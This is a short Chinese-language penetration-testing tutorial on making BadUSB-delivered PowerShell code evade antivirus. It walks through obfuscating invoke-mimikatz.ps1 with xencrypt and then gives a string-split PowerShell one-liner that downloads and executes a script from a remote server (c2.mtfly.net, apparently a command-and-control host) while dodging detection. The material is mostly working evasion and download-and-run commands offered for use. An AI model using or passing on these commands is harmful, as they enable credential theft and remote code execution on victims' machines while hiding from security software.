近源滲透測試badusb執行代碼的免殺
在進行近源滲透測試的時候,我們發現國內殺軟對powershell的管制非常的嚴格,只要有后台隱藏執行的powershell都會觸發可疑行為警報,但是這不代表不能繞過。
生成powershell payload
如圖生成payload,我們使用powershell的payload,就不用勾選64位了
powershell混淆
接下來做混淆,否則ps腳本下載下來也是被殺軟秒殺的,可以使用InvokeObfuscation或者xencrypt。
我這里使用的是xencrypt
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 68
可以選擇免殺68次
https://github.com/the-xentropy/xencrypt
badusb運行腳本拆分免殺
由於免殺后的腳本會很大,所以我們可以用powershell IEX(New-Object Net.WebClient).DownloadString("http://x.x.x.x/2.ps1")從服務器下載ps腳本運行,但是會被殺軟殺,所以可以用拆分免殺。
powershell.exe ”$a1='IEX ((new-objectnet.webclient).downl';$a2='oadstring(''http://c2.mtfly.net/2.ps1''))';$a3="$a1,$a2";IEX(-join $a3)""